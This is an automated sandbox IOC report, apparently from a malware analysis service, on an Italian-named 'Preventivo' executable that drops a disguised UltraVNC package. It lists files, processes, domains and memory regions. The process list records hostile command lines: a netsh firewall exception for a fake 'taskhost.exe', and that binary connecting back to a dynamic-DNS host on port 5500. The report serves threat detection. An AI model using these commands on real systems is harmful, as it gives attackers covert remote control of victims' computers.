IOC Report
Preventivo24.01.11.exe

loading gif

Files

File Path
Type
Category
Malicious
Preventivo24.01.11.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Games\IDD.txt
ASCII text, with CRLF line terminators
dropped
C:\Games\WinVNC.log
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\585b98c7-6e1b-42c6-9d18-1e6776e46b81.tmp
JSON data
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 66791 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7768
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7768
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin
data
dropped
C:\Users\user\AppData\Local\Temp\MSI1b425.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\MSI6F00.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MSI6FDC.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-01-23 12-18-12-549.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\06c15fdc-39b6-4101-8f8f-d99a71462b93.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\67266ffc-a6de-47cb-ac5a-3df74cb4d90b.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\c27b95aa-25ac-4009-8afa-c5c9042cec92.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\d0d7f3e7-a105-4a48-99c9-31e07bf890e8.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
C:\Users\user\AppData\Local\Temp\shi6E82.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\TempFolder\~.pdf
PDF document, version 1.7, 1 pages
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.inf
Windows setup INFormation
modified
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.cat
data
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.ini
Generic INItialization configuration [admin]
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\on.cmd
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\once.cmd
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\powercfg.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {3A995974-27F0-4693-BBBA-215A8CDC3544}, Number of Words: 2, Subject: Your Application, Author: Your Company, Name of Creating Application: Advanced Installer 17.3 build 2e9bb285, Template: ;1033, Comments: This installer database contains the logic and data required to install Your Application., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {1CBDA787-08B6-4366-B2DC-C0D053E322DE}, Number of Words: 8, Subject: Photo and vn, Author: Photo and Fax Vn, Name of Creating Application: Photo and vn (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install Photo and vn. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Jan 14 08:14:24 2024, Last Saved Time/Date: Sun Jan 14 08:14:24 2024, Last Printed: Sun Jan 14 08:14:24 2024, Number of Pages: 450
dropped
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\holder0.aiph
data
dropped
\Device\ConDrv
ASCII text, with CRLF, CR line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 63 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Preventivo24.01.11.exe
C:\Users\user\Desktop\Preventivo24.01.11.exe
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
malicious
C:\Windows\SysWOW64\reg.exe
Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
malicious
C:\Windows\SysWOW64\reg.exe
Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
malicious
C:\Windows\SysWOW64\cmd.exe
cmd
malicious
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
malicious
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
malicious
C:\Games\taskhost.exe
C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
malicious
C:\Windows\SysWOW64\reg.exe
Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
C:\Games\viewer.exe
C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\WMIC.exe
wmic process where (name="taskhost.exe") get commandline
C:\Windows\SysWOW64\findstr.exe
findstr /i "taskhost.exe"
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
C:\Games\viewer.exe
C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
C:\Windows\SysWOW64\timeout.exe
timeout /t 1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f
C:\Windows\SysWOW64\mode.com
Mode 90,20
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f
C:\Windows\SysWOW64\mode.com
Mode 90,20
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\wbem\WMIC.exe
wmic process where (name="taskhost.exe") get commandline
C:\Windows\SysWOW64\findstr.exe
findstr /i "taskhost.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Games\viewer.exe
C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
C:\Games\viewer.exe
C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
C:\Windows\SysWOW64\timeout.exe
timeout /t 20
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\timeout.exe
timeout /t 20
C:\Windows\SysWOW64\timeout.exe
timeout /t 20
C:\Windows\SysWOW64\timeout.exe
timeout /t 20
C:\Windows\SysWOW64\timeout.exe
timeout /t 20
There are 39 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://html4/loose.dtd
unknown
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
unknown
https://sectigo.com/CPS0
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
unknown
http://ocsp.sectigo.com0
unknown
http://ocsp.thawte.com0
unknown
http://www.pdf-tools.com
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
unknown
https://www.uvnc.com
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
unknown
http://.css
unknown
http://www.example.com/download/updates.txt
93.184.216.34
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
unknown
https://forum.uvnc.com
unknown
https://www.uvnc.comcmd
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
https://www.thawte.com/cps0/
unknown
https://forum.uvnc.comvncMenu::WndProc
unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
unknown
https://www.thawte.com/repository0W
unknown
https://www.advancedinstaller.com
unknown
https://www.uvnc.comhttps://forum.uvnc.comnet
unknown
http://java.sun.com/products/plugin/index.html#download
unknown
http://.jpg
unknown
There are 15 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.example.com
93.184.216.34
vnvariant2024.ddnsfree.com
140.228.29.110

IPs

IP
Domain
Country
Malicious
52.202.204.11
unknown
United States
93.184.216.34
www.example.com
European Union
23.54.200.159
unknown
United States
140.228.29.110
vnvariant2024.ddnsfree.com
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\System32\ci.dll,-100
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\System32\ci.dll,-101
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\System32\fveui.dll,-843
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\System32\fveui.dll,-844
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\System32\wuaueng.dll,-400
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%SystemRoot%\system32\NgcRecovery.dll,-100
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\24\417C44EB
@%systemroot%\system32\FirewallControlPanel.dll,-12122
There are 2 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2F81000
heap
page read and write
6F8000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F60000
heap
page read and write
38D000
unkown
page readonly
3260000
trusted library allocation
page read and write
32FF000
stack
page read and write
750000
unclassified section
page readonly
9B0000
heap
page read and write
9DD000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
36DE000
stack
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
99B0000
direct allocation
page read and write
69B0000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
DD8000
heap
page read and write
5F0000
heap
page read and write
A1000
unkown
page execute read
B0C000
stack
page read and write
B94000
heap
page read and write
894000
heap
page read and write
5C0000
unclassified section
page readonly
895000
heap
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
32D0000
heap
page read and write
7DCB000
heap
page read and write
33AB000
stack
page read and write
D0B000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
101F000
stack
page read and write
2F70000
heap
page read and write
344000
unkown
page readonly
894000
heap
page read and write
2F71000
heap
page read and write
54B000
stack
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
3260000
trusted library allocation
page read and write
84E000
stack
page read and write
2F81000
heap
page read and write
7E27000
heap
page read and write
6CF000
stack
page read and write
33D0000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
611000
unkown
page execute read
9D3000
heap
page read and write
2F81000
heap
page read and write
7DCB000
heap
page read and write
7DC4000
heap
page read and write
2F81000
heap
page read and write
A40E000
heap
page read and write
B94000
heap
page read and write
3070000
trusted library allocation
page read and write
610000
unkown
page readonly
B94000
heap
page read and write
894000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
3170000
trusted library allocation
page read and write
BF0000
heap
page read and write
3070000
trusted library allocation
page read and write
2F71000
heap
page read and write
B09000
heap
page read and write
3070000
trusted library allocation
page read and write
33C9000
heap
page read and write
B172000
direct allocation
page read and write
2F81000
heap
page read and write
317C000
stack
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
D30000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
9990000
heap
page read and write
7E18000
heap
page read and write
2E30000
unclassified section
page readonly
3260000
trusted library allocation
page read and write
1189000
heap
page read and write
700000
unclassified section
page readonly
5F0000
heap
page read and write
D27000
heap
page read and write
4C0000
unclassified section
page readonly
6FB000
stack
page read and write
3260000
trusted library allocation
page read and write
B95000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
7E44000
heap
page read and write
D10000
heap
page read and write
B94000
heap
page read and write
330000
unclassified section
page readonly
B94000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
A444000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
2F71000
heap
page read and write
20000
unclassified section
page readonly
540000
heap
page read and write
34AF000
stack
page read and write
9D4000
heap
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
2DC0000
heap
page read and write
DE1000
heap
page read and write
B94000
heap
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
11F0000
unkown
page readonly
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
977000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
33CE000
heap
page read and write
37DF000
stack
page read and write
A60000
heap
page read and write
DCA000
heap
page read and write
B95000
heap
page read and write
923000
heap
page read and write
73C0000
trusted library allocation
page read and write
66F000
unkown
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
7D6B000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
2F71000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
1110000
heap
page read and write
2EFC000
stack
page read and write
3070000
trusted library allocation
page read and write
B94000
heap
page read and write
298F000
stack
page read and write
A531000
heap
page read and write
2F71000
heap
page read and write
895000
heap
page read and write
B3E000
stack
page read and write
2F81000
heap
page read and write
895000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
673000
unkown
page readonly
2F71000
heap
page read and write
2F70000
heap
page read and write
B94000
heap
page read and write
894000
heap
page read and write
99BB000
heap
page read and write
3260000
trusted library allocation
page read and write
30EE000
stack
page read and write
2F81000
heap
page read and write
99E000
stack
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
B60000
heap
page read and write
7E11000
heap
page read and write
8FE000
stack
page read and write
37E0000
trusted library allocation
page read and write
2FCE000
stack
page read and write
B95000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
B11000
heap
page read and write
130000
unclassified section
page readonly
7DFF000
heap
page read and write
D49000
heap
page read and write
37E0000
trusted library allocation
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
26EE000
stack
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
2E50000
heap
page read and write
E5E000
stack
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
500000
heap
page read and write
D4B000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
34F2000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
69B4000
heap
page read and write
37E0000
trusted library allocation
page read and write
37E0000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
CF3000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
7DA0000
heap
page read and write
2F81000
heap
page read and write
895000
heap
page read and write
3070000
trusted library allocation
page read and write
33CF000
heap
page read and write
B94000
heap
page read and write
2AA0000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
AEC000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
7E06000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
894000
heap
page read and write
610000
unkown
page readonly
A0000
unkown
page readonly
9F6000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
72CF000
stack
page read and write
2F81000
heap
page read and write
DDD000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F71000
heap
page read and write
1FD000
unkown
page readonly
37E0000
trusted library allocation
page read and write
7D64000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
7DDF000
heap
page read and write
2C7E000
stack
page read and write
B3F000
stack
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
EFE000
stack
page read and write
610000
unkown
page readonly
894000
heap
page read and write
70CE000
stack
page read and write
894000
heap
page read and write
78E000
stack
page read and write
A20000
unclassified section
page readonly
2F81000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
C60000
heap
page read and write
CA0000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
659000
unkown
page readonly
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
A30000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
79C000
stack
page read and write
A90000
unclassified section
page readonly
2F81000
heap
page read and write
894000
heap
page read and write
894000
heap
page read and write
DD4000
heap
page read and write
37E0000
trusted library allocation
page read and write
610000
unkown
page readonly
2F71000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
894000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
